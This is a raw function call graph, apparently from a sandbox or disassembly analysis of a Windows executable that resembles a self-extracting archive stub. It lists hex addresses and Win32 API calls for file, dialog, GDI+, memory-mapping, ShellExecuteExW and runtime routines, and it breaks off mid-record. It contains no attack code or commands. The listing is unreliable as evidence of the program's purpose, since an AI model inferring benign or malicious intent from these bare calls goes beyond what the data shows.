23715 b3b6fe 23713->23715 23716 b3b71a 23714->23716 23855 b3a6c2 FindResourceW 23715->23855 23850 b3a5c6 23716->23850 23721 b3b770 23732 b2da42 23721->23732 23722 b3b74c 23871 b3a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23722->23871 23723 b3a6c2 13 API calls 23725 b3b73d 23723->23725 23725->23722 23727 b3b743 DeleteObject 23725->23727 23726 b3b754 23872 b3a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23726->23872 23727->23722 23729 b3b75d 23873 b3a80c 8 API calls 23729->23873 23731 b3b764 DeleteObject 23731->23721 23884 b2da67 23732->23884 23737 b390b7 24017 b3eb38 23737->24017 23741 b3acab GdiplusShutdown CoUninitialize 23740->23741 23741->23489 23743->23481 23744->23487 23746 b3086d GetModuleHandleW 23745->23746 23746->23649 23746->23650 23748 b2b15a GetVersionExW 23747->23748 23749 b2b196 23747->23749 23748->23749 23749->23663 23751 b3ec50 23750->23751 23752 b30828 GetSystemDirectoryW 23751->23752 23753 b30840 23752->23753 23754 b3085e 23752->23754 23755 b30851 LoadLibraryW 23753->23755 23754->23663 23755->23754 23756->23656 23758 b2e627 23757->23758 23763 b2e648 23758->23763 23762 b43e1b 23761->23762 23762->23687 23762->23762 23769 b2d9b0 23763->23769 23766 b2e645 23766->23690 23767 b2e66b LoadStringW 23767->23766 23768 b2e682 LoadStringW 23767->23768 23768->23766 23774 b2d8ec 23769->23774 23771 b2d9cd 23772 b2d9e2 23771->23772 23782 b2d9f0 26 API calls 23771->23782 23772->23766 23772->23767 23775 b2d904 23774->23775 23781 b2d984 _strncpy 23774->23781 23776 b2d928 23775->23776 23783 b31da7 WideCharToMultiByte 23775->23783 23778 b2d959 23776->23778 23784 b2e5b1 50 API calls __vsnprintf 23776->23784 23785 b46159 26 API calls 3 library calls 23778->23785 23781->23771 23782->23772 23783->23776 23784->23778 23785->23781 23786->23703 23788 b2407c __vsnwprintf_l 23787->23788 23791 b45fd4 23788->23791 23794 b44097 23791->23794 23795 b440d7 23794->23795 23796 b440bf 23794->23796 23795->23796 23797 b440df 23795->23797 23811 b491a8 20 API calls __dosmaperr 23796->23811 23813 b44636 23797->23813 23800 b440c4 23812 b49087 26 API calls __cftof 23800->23812 23803 b440cf 23805 b3fbbc _ValidateLocalCookies 5 API calls 23803->23805 23807 b24086 SetEnvironmentVariableW GetModuleHandleW LoadIconW 23805->23807 23806 b44167 23822 b449e6 51 API calls 3 library calls 23806->23822 23807->23713 23810 b44172 23823 b446b9 20 API calls _free 23810->23823 23811->23800 23812->23803 23814 b44653 23813->23814 23815 b440ef 23813->23815 23814->23815 23824 b497e5 GetLastError 23814->23824 23821 b44601 20 API calls 2 library calls 23815->23821 23817 b44674 23844 b4993a 38 API calls __cftof 23817->23844 23819 b4468d 23845 b49967 38 API calls __cftof 23819->23845 23821->23806 23822->23810 23823->23803 23825 b49801 23824->23825 23826 b497fb 23824->23826 23828 b4b136 _abort 20 API calls 23825->23828 23830 b49850 SetLastError 23825->23830 23846 b4ae5b 11 API calls 2 library calls 23826->23846 23829 b49813 23828->23829 23831 b4981b 23829->23831 23847 b4aeb1 11 API calls 2 library calls 23829->23847 23830->23817 23833 b48dcc _free 20 API calls 23831->23833 23835 b49821 23833->23835 23834 b49830 23834->23831 23836 b49837 23834->23836 23837 b4985c SetLastError 23835->23837 23848 b49649 20 API calls _abort 23836->23848 23849 b48d24 38 API calls _abort 23837->23849 23839 b49842 23841 b48dcc _free 20 API calls 23839->23841 23843 b49849 23841->23843 23843->23830 23843->23837 23844->23819 23845->23815 23846->23825 23847->23834 23848->23839 23874 b3a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23850->23874 23852 b3a5cd 23853 b3a5d9 23852->23853 23875 b3a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23852->23875 23853->23721 23853->23722 23853->23723 23856 b3a6e5 SizeofResource 23855->23856 23857 b3a7d3 23855->23857 23856->23857 23858 b3a6fc LoadResource 23856->23858 23857->23714 23857->23716 23858->23857 23859 b3a711 LockResource 23858->23859 23859->23857 23860 b3a722 GlobalAlloc 23859->23860 23860->23857 23861 b3a73d GlobalLock 23860->23861 23862 b3a7cc GlobalFree 23861->23862 23863 b3a74c __InternalCxxFrameHandler 23861->23863 23862->23857 23864 b3a754 CreateStreamOnHGlobal 23863->23864 23865 b3a7c5 GlobalUnlock 23864->23865 23866 b3a76c 23864->23866 23865->23862 23876 b3a626 GdipAlloc 23866->23876 23869 b3a7b0 23869->23865 23870 b3a79a GdipCreateHBITMAPFromBitmap 23870->23869 23871->23726 23872->23729 23873->23731 23874->23852 23875->23853 23877 b3a638 23876->23877 23879 b3a645 23876->23879 23880 b3a3b9 23877->23880 23879->23865 23879->23869 23879->23870 23881 b3a3e1 GdipCreateBitmapFromStream 23880->23881 23882 b3a3da GdipCreateBitmapFromStreamICM 23880->23882 23883 b3a3e6 23881->23883 23882->23883 23883->23879 23885 b2da75 __EH_prolog 23884->23885 23886 b2daa4 GetModuleFileNameW 23885->23886 23887 b2dad5 23885->23887 23888 b2dabe 23886->23888 23930 b298e0 23887->23930 23888->23887 23890 b2db31 23941 b46310 23890->23941 23893 b2e261 78 API calls 23896 b2db05 23893->23896 23895 b2db44 23897 b46310 26 API calls 23895->23897 23896->23890 23896->23893 23909 b2dd4a 23896->23909 23905 b2db56 ___vcrt_FlsSetValue 23897->23905 23898 b2dc85 23898->23909 23977 b29d70 81 API calls 23898->23977 23902 b2dc9f ___std_exception_copy 23903 b29bd0 82 API calls 23902->23903 23902->23909 23906 b2dcc8 ___std_exception_copy 23903->23906 23905->23898 23905->23909 23955 b29e80 23905->23955 23971 b29bd0 23905->23971 23976 b29d70 81 API calls 23905->23976 23908 b2dcd3 ___vcrt_FlsSetValue _wcslen ___std_exception_copy 23906->23908 23906->23909 23978 b31b84 MultiByteToWideChar 23906->23978 23908->23909 23910 b2e159 23908->23910 23925 b31da7 WideCharToMultiByte 23908->23925 23979 b2e5b1 50 API calls __vsnprintf 23908->23979 23980 b46159 26 API calls 3 library calls 23908->23980 23981 b48cce 26 API calls 2 library calls 23908->23981 23982 b47625 26 API calls 2 library calls 23908->23982 23983 b2e27c 78 API calls 23908->23983 23964 b2959a 23909->23964 23921 b2e1de 23910->23921 23984 b48cce 26 API calls 2 library calls 23910->23984 23912 b2e16e 23985 b47625 26 API calls 2 library calls 23912->23985 23914 b2e214 23919 b46310 26 API calls 23914->23919 23916 b2e1c6 23986 b2e27c 78 API calls 23916->23986 23918 b2e261 78 API calls 23918->23921 23920 b2e22d 23919->23920 23922 b46310 26 API calls 23920->23922 23921->23914 23921->23918 23922->23909 23925->23908 23928 b2e29e GetModuleHandleW FindResourceW 23929 b2da55 23928->23929 23929->23737 23931 b298ea 23930->23931 23932 b2994b CreateFileW 23931->23932 23933 b2996c GetLastError 23932->23933 23936 b299bb 23932->23936 23987 b2bb03 23933->23987 23935 b2998c 23935->23936 23938 b29990 CreateFileW GetLastError 23935->23938 23937 b299ff 23936->23937 23939 b299e5 SetFileTime 23936->23939 23937->23896 23938->23936 23940 b299b5 23938->23940 23939->23937 23940->23936 23942 b46349 23941->23942 23943 b4634d 23942->23943 23954 b46375 23942->23954 23991 b491a8 20 API calls __dosmaperr 23943->23991 23945 b46352 23992 b49087 26 API calls __cftof 23945->23992 23946 b3fbbc _ValidateLocalCookies 5 API calls 23949 b466a6 23946->23949 23948 b4635d 23950 b3fbbc _ValidateLocalCookies 5 API calls 23948->23950 23949->23895 23951 b46369 23950->23951 23951->23895 23953 b46699 23953->23946 23954->23953 23993 b46230 5 API calls _ValidateLocalCookies 23954->23993 23956 b29e92 23955->23956 23959 b29ea5 23955->23959 23961 b29eb0 23956->23961 23994 b26d5b 77 API calls 23956->23994 23958 b29eb8 SetFilePointer 23960 b29ed4 GetLastError 23958->23960 23958->23961 23959->23958 23959->23961 23960->23961 23962 b29ede 23960->23962 23961->23905 23962->23961 23995 b26d5b 77 API calls 23962->23995 23965 b295cf 23964->23965 23966 b295be 23964->23966 23965->23928 23966->23965 23967 b295d1 23966->23967 23968 b295ca 23966->23968 24001 b29620 23967->24001 23996 b2974e 23968->23996 23972 b29bdc 23971->23972 23974 b29be3 23971->23974 23972->23905 23974->23972 23975 b29785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 23974->23975 24016 b26d1a 77 API calls 23974->24016 23975->23974 23976->23905 23977->23902 23978->23908 23979->23908 23980->23908 23981->23908 23982->23908 23983->23908 23984->23912 23985->23916 23986->23921 23988 b2bb10 _wcslen 23987->23988 23989 b2bbb8 GetCurrentDirectoryW 23988->23989 23990 b2bb39 _wcslen 23988->23990 23989->23990 23990->23935 23991->23945 23992->23948 23993->23954 23994->23959 23995->23961 23997 b29781 23996->23997 23998 b29757 23996->23998 23997->23965 23998->23997 24007 b2a1e0 23998->24007 24002 b2964a 24001->24002 24003 b2962c 24001->24003 24004 b29669 24002->24004 24015 b26bd5 76 API calls 24002->24015 24003->24002 24005 b29638 CloseHandle 24003->24005 24004->23965 24005->24002 24008 b3ec50 24007->24008 24009 b2a1ed DeleteFileW 24008->24009 24010 b2a200 24009->24010 24011 b2977f 24009->24011 24012 b2bb03 GetCurrentDirectoryW 24010->24012 24011->23965 24013 b2a214 24012->24013 24013->24011 24014 b2a218 DeleteFileW 24013->24014 24014->24011 24015->24004 24016->23974 24019 b3eb3d ___std_exception_copy 24017->24019 24018 b390d6 24018->23473 24019->24018 24021 b3eb59 24019->24021 24026 b47a5e 7 API calls 2 library calls 24019->24026 24022 b3f5c9 24021->24022 24027 b4238d RaiseException 24021->24027 24028 b4238d RaiseException 24022->24028 24024 b3f5e6 24026->24019 24027->24022 24028->24024 24030 b47ce1 _abort 24029->24030 24031 b47ce8 24030->24031 24032 b47cfa 24030->24032 24065 b47e2f GetModuleHandleW 24031->24065 24053 b4ac31 EnterCriticalSection 24032->24053 24035 b47ced 24035->24032 24066 b47e73 GetModuleHandleExW 24035->24066 24038 b47d01 24040 b47d76 24038->24040 24050 b47d9f 24038->24050 24074 b487e0 20 API calls _abort 24038->24074 24044 b47d8e 24040->24044 24049 b48a91 _abort 5 API calls 24040->24049 24042 b47dbc 24057 b47dee 24042->24057 24043 b47de8 24075 b52390 5 API calls _ValidateLocalCookies 24043->24075 24045 b48a91 _abort 5 API calls 24044->24045 24045->24050 24049->24044 24054 b47ddf 24050->24054 24053->24038 24076 b4ac81 LeaveCriticalSection 24054->24076 24056 b47db8 24056->24042 24056->24043 24077 b4b076 24057->24077 24060 b47e1c 24063 b47e73 _abort 8 API calls 24060->24063 24061 b47dfc GetPEB 24061->24060 24062 b47e0c GetCurrentProcess TerminateProcess 24061->24062 24062->24060 24064 b47e24 ExitProcess 24063->24064 24065->24035 24067 b47ec0 24066->24067 24068 b47e9d GetProcAddress 24066->24068 24070 b47ec6 FreeLibrary 24067->24070 24071 b47ecf 24067->24071 24069 b47eb2 24068->24069 24069->24067 24070->24071 24072 b3fbbc _ValidateLocalCookies 5 API calls 24071->24072 24073 b47cf9 24072->24073 24073->24032 24074->24040 24076->24056 24078 b4b091 24077->24078 24079 b4b09b 24077->24079 24081 b3fbbc _ValidateLocalCookies 5 API calls 24078->24081 24080 b4ac98 _abort 5 API calls 24079->24080 24080->24078 24082 b47df8 24081->24082 24082->24060 24082->24061 24083 b3e5b1 24084 b3e578 24083->24084 24084->24083 24086 b3e85d 24084->24086 24112 b3e5bb 24086->24112 24088 b3e86d 24089 b3e8ca 24088->24089 24090 b3e8ee 24088->24090 24091 b3e7fb DloadReleaseSectionWriteAccess 6 API calls 24089->24091 24094 b3e966 LoadLibraryExA 24090->24094 24095 b3e9c7 24090->24095 24097 b3e9d9 24090->24097 24107 b3ea95 24090->24107 24092 b3e8d5 RaiseException 24091->24092 24093 b3eac3 24092->24093 24093->24084 24094->24095 24096 b3e979 GetLastError 24094->24096 24095->24097 24098 b3e9d2 FreeLibrary 24095->24098 24099 b3e9a2 24096->24099 24100 b3e98c 24096->24100 24101 b3ea37 GetProcAddress 24097->24101 24097->24107 24098->24097 24103 b3e7fb DloadReleaseSectionWriteAccess 6 API calls 24099->24103 24100->24095 24100->24099 24102 b3ea47 GetLastError 24101->24102 24101->24107 24105 b3ea5a 24102->24105 24104 b3e9ad RaiseException 24103->24104 24104->24093 24105->24107 24108 b3e7fb DloadReleaseSectionWriteAccess 6 API calls 24105->24108 24121 b3e7fb 24107->24121 24109 b3ea7b RaiseException 24108->24109 24110 b3e5bb ___delayLoadHelper2@8 6 API calls 24109->24110 24111 b3ea92 24110->24111 24111->24107 24113 b3e5c7 24112->24113 24114 b3e5ed 24112->24114 24129 b3e664 24113->24129 24114->24088 24116 b3e5cc 24117 b3e5e8 24116->24117 24132 b3e78d 24116->24132 24137 b3e5ee GetModuleHandleW GetProcAddress GetProcAddress 24117->24137 24120 b3e836 24120->24088 24122 b3e82f 24121->24122 24123 b3e80d 24121->24123 24122->24093 24124 b3e664 DloadReleaseSectionWriteAccess 3 API calls 24123->24124 24125 b3e812 24124->24125 24126 b3e82a 24125->24126 24127 b3e78d DloadProtectSection 3 API calls 24125->24127 24140 b3e831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 24126->24140 24127->24126 24138 b3e5ee GetModuleHandleW GetProcAddress GetProcAddress 24129->24138 24131 b3e669 24131->24116 24133 b3e7a2 DloadProtectSection 24132->24133 24134 b3e7dd VirtualProtect 24133->24134 24135 b3e7a8 24133->24135 24139 b3e6a3 VirtualQuery GetSystemInfo 24133->24139 24134->24135 24135->24117 24137->24120 24138->24131 24139->24134 24140->24122 25368 b3b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 25410 b31bbd GetCPInfo IsDBCSLeadByte 25333 b3dca1 DialogBoxParamW 25411 b3f3a0 27 API calls 25336 b4a4a0 71 API calls _free 25370 b3eda7 48 API calls _unexpected 25337 b508a0 IsProcessorFeaturePresent 25412 b26faa 111 API calls 3 library calls 25339 b4b49d 6 API calls _ValidateLocalCookies 25372 b39580 6 API calls 25394 b3c793 102 API calls 4 library calls 25341 b3c793 97 API calls 4 library calls 25374 b3b18d 78 API calls 25375 b295f0 80 API calls 25376 b3fd4f 9 API calls 2 library calls 25395 b25ef0 82 API calls 24298 b498f0 24306 b4adaf 24298->24306 24301 b49904 24303 b4990c 24304 b49919 24303->24304 24314 b49920 11 API calls 24303->24314 24307 b4ac98 _abort 5 API calls 24306->24307 24308 b4add6 24307->24308 24309 b4adee TlsAlloc 24308->24309 24310 b4addf 24308->24310 24309->24310 24311 b3fbbc _ValidateLocalCookies 5 API calls 24310->24311 24312 b498fa 24311->24312 24312->24301 24313 b49869 20 API calls 2 library calls 24312->24313 24313->24303 24314->24301 24315 b4abf0 24316 b4abfb 24315->24316 24317 b4af0a 11 API calls 24316->24317 24318 b4ac24 24316->24318 24320 b4ac20 24316->24320 24317->24316 24321 b4ac50 DeleteCriticalSection 24318->24321 24321->24320 25342 b488f0 7 API calls ___scrt_uninitialize_crt 25344 b42cfb 38 API calls 4 library calls 24348 b3b7e0 24349 b3b7ea __EH_prolog 24348->24349 24516 b21316 24349->24516 24352 b3b841 24353 b3b82a 24353->24352 24356 b3b89b 24353->24356 24357 b3b838 24353->24357 24354 b3bf0f 24581 b3d69e 24354->24581 24359 b3b92e GetDlgItemTextW 24356->24359 24365 b3b8b1 24356->24365 24360 b3b878 24357->24360 24361 b3b83c 24357->24361 24359->24360 24364 b3b96b 24359->24364 24360->24352 24369 b3b95f KiUserCallbackDispatcher 24360->24369 24361->24352 24372 b2e617 53 API calls 24361->24372 24362 b3bf2a SendMessageW 24363 b3bf38 24362->24363 24366 b3bf52 GetDlgItem SendMessageW 24363->24366 24367 b3bf41 SendDlgItemMessageW 24363->24367 24370 b3b980 GetDlgItem 24364->24370 24514 b3b974 24364->24514 24371 b2e617 53 API calls 24365->24371 24599 b3a64d GetCurrentDirectoryW 24366->24599 24367->24366 24369->24352 24374 b3b9b7 SetFocus 24370->24374 24375 b3b994 SendMessageW SendMessageW 24370->24375 24376 b3b8ce SetDlgItemTextW 24371->24376 24377 b3b85b 24372->24377 24373 b3bf82 GetDlgItem 24379 b3bfa5 SetWindowTextW 24373->24379 24380 b3bf9f 24373->24380 24381 b3b9c7 24374->24381 24392 b3b9e0 24374->24392 24375->24374 24382 b3b8d9 24376->24382 24621 b2124f SHGetMalloc 24377->24621 24600 b3abab GetClassNameW 24379->24600 24380->24379 24386 b2e617 53 API calls 24381->24386 24382->24352 24389 b3b8e6 GetMessageW 24382->24389 24383 b3b862 24383->24352 24391 b3c1fc SetDlgItemTextW 24383->24391 24384 b3be55 24387 b2e617 53 API calls 24384->24387 24390 b3b9d1 24386->24390 24393 b3be65 SetDlgItemTextW 24387->24393 24389->24352 24395 b3b8fd IsDialogMessageW 24389->24395 24622 b3d4d4 24390->24622 24391->24352 24400 b2e617 53 API calls 24392->24400 24397 b3be79 24393->24397 24395->24382 24399 b3b90c TranslateMessage DispatchMessageW 24395->24399 24402 b2e617 53 API calls 24397->24402 24399->24382 24401 b3ba17 24400->24401 24403 b24092 _swprintf 51 API calls 24401->24403 24428 b3be9c _wcslen 24402->24428 24409 b3ba29 24403->24409 24404 b3b9d9 24526 b2a0b1 24404->24526 24405 b3c73f 97 API calls 24408 b3bff0 24405->24408 24407 b3c020 24415 b3c73f 97 API calls 24407->24415 24467 b3c0d8 24407->24467 24408->24407 24411 b2e617 53 API calls 24408->24411 24417 b3d4d4 16 API calls 24409->24417 24414 b3c003 SetDlgItemTextW 24411->24414 24412 b3ba73 24532 b3ac04 SetCurrentDirectoryW 24412->24532 24413 b3ba68 GetLastError 24413->24412 24418 b2e617 53 API calls 24414->24418 24420 b3c03b 24415->24420 24416 b3c18b 24421 b3c194 EnableWindow 24416->24421 24422 b3c19d 24416->24422 24417->24404 24424 b3c017 SetDlgItemTextW 24418->24424 24432 b3c04d 24420->24432 24458 b3c072 24420->24458 24421->24422 24427 b3c1ba 24422->24427 24640 b212d3 GetDlgItem EnableWindow 24422->24640 24423 b3beed 24426 b2e617 53 API calls 24423->24426 24424->24407 24425 b3ba87 24430 b3ba9e 24425->24430 24431 b3ba90 GetLastError 24425->24431 24426->24352 24429 b3c1e1 24427->24429 24444 b3c1d9 SendMessageW 24427->24444 24428->24423 24439 b2e617 53 API calls 24428->24439 24429->24352 24445 b2e617 53 API calls 24429->24445 24437 b3bb11 24430->24437 24440 b3bb20 24430->24440 24446 b3baae GetTickCount 24430->24446 24431->24430 24638 b39ed5 32 API calls 24432->24638 24433 b3c0cb 24436 b3c73f 97 API calls 24433->24436 24435 b3c1b0 24641 b212d3 GetDlgItem EnableWindow 24435->24641 24436->24467 24437->24440 24441 b3bd56 24437->24441 24447 b3bed0 24439->24447 24448 b3bcfb 24440->24448 24450 b3bcf1 24440->24450 24451 b3bb39 GetModuleFileNameW 24440->24451 24541 b212f1 GetDlgItem ShowWindow 24441->24541 24442 b3c066 24442->24458 24444->24429 24445->24383 24453 b24092 _swprintf 51 API calls 24446->24453 24454 b24092 _swprintf 51 API calls 24447->24454 24457 b2e617 53 API calls 24448->24457 24449 b3c169 24639 b39ed5 32 API calls 24449->24639 24450->24360 24450->24448 24632 b2f28c 82 API calls 24451->24632 24460 b3bac7 24453->24460 24454->24423 24464 b3bd05 24457->24464 24458->24433 24465 b3c73f 97 API calls 24458->24465 24459 b3bd66 24542 b212f1 GetDlgItem ShowWindow 24459->24542 24533 b2966e 24460->24533 24461 b2e617 53 API calls 24461->24467 24462 b3c188 24462->24416 24463 b3bb5f 24468 b24092 _swprintf 51 API calls 24463->24468 24469 b24092 _swprintf 51 API calls 24464->24469 24470 b3c0a0 24465->24470 24467->24416 24467->24449 24467->24461 24472 b3bb81 CreateFileMappingW 24468->24472 24473 b3bd23 24469->24473 24470->24433 24474 b3c0a9 DialogBoxParamW 24470->24474 24471 b3bd70 24475 b2e617 53 API calls 24471->24475 24478 b3bbe3 GetCommandLineW 24472->24478 24510 b3bc60 __InternalCxxFrameHandler 24472->24510 24487 b2e617 53 API calls 24473->24487 24474->24360 24474->24433 24479 b3bd7a SetDlgItemTextW 24475->24479 24477 b3baed 24480 b3baff 24477->24480 24481 b3baf4 GetLastError 24477->24481 24482 b3bbf4 24478->24482 24543 b212f1 GetDlgItem ShowWindow 24479->24543 24485 b2959a 80 API calls 24480->24485 24481->24480 24633 b3b425 SHGetMalloc 24482->24633 24483 b3bc6b ShellExecuteExW 24505 b3bc88 24483->24505 24485->24437 24492 b3bd3d 24487->24492 24488 b3bd8c SetDlgItemTextW GetDlgItem 24489 b3bdc1 24488->24489 24490 b3bda9 GetWindowLongW SetWindowLongW 24488->24490 24544 b3c73f 24489->24544 24490->24489 24491 b3bc10 24634 b3b425 SHGetMalloc 24491->24634 24496 b3bc1c 24635 b3b425 SHGetMalloc 24496->24635 24497 b3bccb 24497->24450 24503 b3bce1 UnmapViewOfFile CloseHandle 24497->24503 24498 b3c73f 97 API calls 24500 b3bddd 24498->24500 24569 b3da52 24500->24569 24501 b3bc28 24636 b2f3fa 82 API calls 2 library calls 24501->24636 24503->24450 24505->24497 24508 b3bcb7 Sleep 24505->24508 24507 b3bc3f MapViewOfFile 24507->24510 24508->24497 24508->24505 24509 b3c73f 97 API calls 24513 b3be03 24509->24513 24510->24483 24511 b3be2c 24637 b212d3 GetDlgItem EnableWindow 24511->24637 24513->24511 24515 b3c73f 97 API calls 24513->24515 24514->24360 24514->24384 24515->24511 24517 b21378 24516->24517 24518 b2131f 24516->24518 24643 b2e2c1 GetWindowLongW SetWindowLongW 24517->24643 24520 b21385 24518->24520 24642 b2e2e8 62 API calls 2 library calls 24518->24642 24520->24352 24520->24353 24520->24354 24522 b21341 24522->24520 24523 b21354 GetDlgItem 24522->24523 24523->24520 24524 b21364 24523->24524 24524->24520 24525 b2136a SetWindowTextW 24524->24525 24525->24520 24528 b2a0bb 24526->24528 24527 b2a14c 24529 b2a2b2 8 API calls 24527->24529 24531 b2a175 24527->24531 24528->24527 24528->24531 24644 b2a2b2 24528->24644 24529->24531 24531->24412 24531->24413 24532->24425 24534 b29678 24533->24534 24535 b296d5 CreateFileW 24534->24535 24536 b296c9 24534->24536 24535->24536 24537 b2971f 24536->24537 24538 b2bb03 GetCurrentDirectoryW 24536->24538 24537->24477 24539 b29704 24538->24539 24539->24537 24540 b29708 CreateFileW 24539->24540 24540->24537 24541->24459 24542->24471 24543->24488 24545 b3c749 __EH_prolog 24544->24545 24546 b3bdcf 24545->24546 24676 b3b314 24545->24676 24546->24498 24549 b3b314 ExpandEnvironmentStringsW 24558 b3c780 _wcslen _wcsrchr 24549->24558 24550 b3ca67 SetWindowTextW 24550->24558 24555 b3c855 SetFileAttributesW 24556 b3c90f GetFileAttributesW 24555->24556 24568 b3c86f __cftof _wcslen 24555->24568 24556->24558 24559 b3c921 DeleteFileW 24556->24559 24558->24546 24558->24549 24558->24550 24558->24555 24561 b3cc31 GetDlgItem SetWindowTextW SendMessageW 24558->24561 24564 b3cc71 SendMessageW 24558->24564 24680 b31fbb CompareStringW 24558->24680 24681 b3a64d GetCurrentDirectoryW 24558->24681 24683 b2a5d1 6 API calls 24558->24683 24684 b2a55a FindClose 24558->24684 24685 b3b48e 76 API calls 2 library calls 24558->24685 24686 b43e3e 24558->24686 24559->24558 24562 b3c932 24559->24562 24561->24558 24563 b24092 _swprintf 51 API calls 24562->24563 24565 b3c952 GetFileAttributesW 24563->24565 24564->24558 24565->24562 24566 b3c967 MoveFileW 24565->24566 24566->24558 24567 b3c97f MoveFileExW 24566->24567 24567->24558 24568->24556 24568->24558 24682 b2b991 51 API calls 2 library calls 24568->24682 24570 b3da5c __EH_prolog 24569->24570 24701 b30659 24570->24701 24572 b3da8d 24705 b25b3d 24572->24705 24574 b3daab 24709 b27b0d 24574->24709 24578 b3dafe 24725 b27b9e 24578->24725 24580 b3bdee 24580->24509 24582 b3d6a8 24581->24582 24583 b3a5c6 4 API calls 24582->24583 24584 b3d6ad 24583->24584 24585 b3bf15 24584->24585 24586 b3d6b5 GetWindow 24584->24586 24585->24362 24585->24363 24586->24585 24591 b3d6d5 24586->24591 24587 b3d6e2 GetClassNameW 25202 b31fbb CompareStringW 24587->25202 24589 b3d706 GetWindowLongW 24590 b3d76a GetWindow 24589->24590 24592 b3d716 SendMessageW 24589->24592 24590->24585 24590->24591 24591->24585 24591->24587 24591->24589 24591->24590 24592->24590 24593 b3d72c GetObjectW 24592->24593 25203 b3a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24593->25203 24595 b3d743 25204 b3a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24595->25204 25205 b3a80c 8 API calls 24595->25205 24598 b3d754 SendMessageW DeleteObject 24598->24590 24599->24373 24601 b3abf1 24600->24601 24602 b3abcc 24600->24602 24604 b3abf6 SHAutoComplete 24601->24604 24605 b3abff 24601->24605 25206 b31fbb CompareStringW 24602->25206 24604->24605 24608 b3b093 24605->24608 24606 b3abdf 24606->24601 24607 b3abe3 FindWindowExW 24606->24607 24607->24601 24609 b3b09d __EH_prolog 24608->24609 24610 b213dc 84 API calls 24609->24610 24611 b3b0bf 24610->24611 25207 b21fdc 24611->25207 24614 b3b0eb 24617 b219af 128 API calls 24614->24617 24615 b3b0d9 24616 b21692 86 API calls 24615->24616 24618 b3b0e4 24616->24618 24620 b3b10d __InternalCxxFrameHandler ___std_exception_copy 24617->24620 24618->24405 24618->24408 24619 b21692 86 API calls 24619->24618 24620->24619 24621->24383 25215 b3b568 PeekMessageW 24622->25215 24625 b3d502 24629 b3d50d ShowWindow SendMessageW SendMessageW 24625->24629 24626 b3d536 SendMessageW SendMessageW 24627 b3d572 24626->24627 24628 b3d591 SendMessageW SendMessageW SendMessageW 24626->24628 24627->24628 24630 b3d5e7 SendMessageW 24628->24630 24631 b3d5c4 SendMessageW 24628->24631 24629->24626 24630->24404 24631->24630 24632->24463 24633->24491 24634->24496 24635->24501 24636->24507 24637->24514 24638->24442 24639->24462 24640->24435 24641->24427 24642->24522 24643->24520 24645 b2a2bf 24644->24645 24646 b2a2e3 24645->24646 24647 b2a2d6 CreateDirectoryW 24645->24647 24665 b2a231 24646->24665 24647->24646 24649 b2a316 24647->24649 24652 b2a325 24649->24652 24657 b2a4ed 24649->24657 24651 b2a329 GetLastError 24651->24652 24652->24528 24653 b2bb03 GetCurrentDirectoryW 24655 b2a2ff 24653->24655 24655->24651 24656 b2a303 CreateDirectoryW 24655->24656 24656->24649 24656->24651 24658 b3ec50 24657->24658 24659 b2a4fa SetFileAttributesW 24658->24659 24660 b2a510 24659->24660 24661 b2a53d 24659->24661 24662 b2bb03 GetCurrentDirectoryW 24660->24662 24661->24652 24663 b2a524 24662->24663 24663->24661 24664 b2a528 SetFileAttributesW 24663->24664 24664->24661 24668 b2a243 24665->24668 24669 b3ec50 24668->24669 24670 b2a250 GetFileAttributesW 24669->24670 24671 b2a261 24670->24671 24672 b2a23a 24670->24672 24673 b2bb03 GetCurrentDirectoryW 24671->24673 24672->24651 24672->24653 24674 b2a275 24673->24674 24674->24672 24675 b2a279 GetFileAttributesW 24674->24675 24675->24672 24677 b3b31e 24676->24677 24678 b3b3f0 ExpandEnvironmentStringsW 24677->24678 24679 b3b40d 24677->24679 24678->24679 24679->24558 24680->24558 24681->24558 24682->24568 24683->24558 24684->24558 24685->24558 24687 b48e54 24686->24687 24688 b48e61 24687->24688 24689 b48e6c 24687->24689 24690 b48e06 __vsnwprintf_l 21 API calls 24688->24690 24691 b48e74 24689->24691 24697 b48e7d _abort 24689->24697 24696 b48e69 24690->24696 24692 b48dcc _free 20 API calls 24691->24692 24692->24696 24693 b48ea7 HeapReAlloc 24693->24696 24693->24697 24694 b48e82 24699 b491a8 20 API calls __dosmaperr 24694->24699 24696->24558 24697->24693 24697->24694 24700 b47a5e 7 API calls 2 library calls 24697->24700 24699->24696 24700->24697 24702 b30666 _wcslen 24701->24702 24729 b217e9 24702->24729 24704 b3067e 24704->24572 24706 b30659 _wcslen 24705->24706 24707 b217e9 78 API calls 24706->24707 24708 b3067e 24707->24708 24708->24574 24710 b27b17 __EH_prolog 24709->24710 24746 b2ce40 24710->24746 24712 b27b32 24713 b3eb38 8 API calls 24712->24713 24714 b27b5c 24713->24714 24752 b34a76 24714->24752 24717 b27c7d 24718 b27c87 24717->24718 24720 b27cf1 24718->24720 24781 b2a56d 24718->24781 24722 b27d50 24720->24722 24759 b28284 24720->24759 24721 b27d92 24721->24578 24722->24721 24787 b2138b 74 API calls 24722->24787 24726 b27bac 24725->24726 24728 b27bb3 24725->24728 24727 b32297 86 API calls 24726->24727 24727->24728 24730 b217ff 24729->24730 24741 b2185a __InternalCxxFrameHandler 24729->24741 24731 b21828 24730->24731 24742 b26c36 76 API calls __vswprintf_c_l 24730->24742 24733 b21887 24731->24733 24738 b21847 ___std_exception_copy 24731->24738 24735 b43e3e 22 API calls 24733->24735 24734 b2181e 24743 b26ca7 75 API calls 24734->24743 24737 b2188e 24735->24737 24737->24741 24745 b26ca7 75 API calls 24737->24745 24738->24741 24744 b26ca7 75 API calls 24738->24744 24741->24704 24742->24734 24743->24731 24744->24741 24745->24741 24747 b2ce4a __EH_prolog 24746->24747 24748 b3eb38 8 API calls 24747->24748 24750 b2ce8d 24748->24750 24749 b3eb38 8 API calls 24751 b2ceb1 24749->24751 24750->24749 24751->24712 24753 b34a80 __EH_prolog 24752->24753 24754 b3eb38 8 API calls 24753->24754 24755 b34a9c 24754->24755 24756 b27b8b 24755->24756 24758 b30e46 80 API calls 24755->24758 24756->24717 24758->24756 24760 b2828e __EH_prolog 24759->24760 24788 b213dc 24760->24788 24762 b282aa 24763 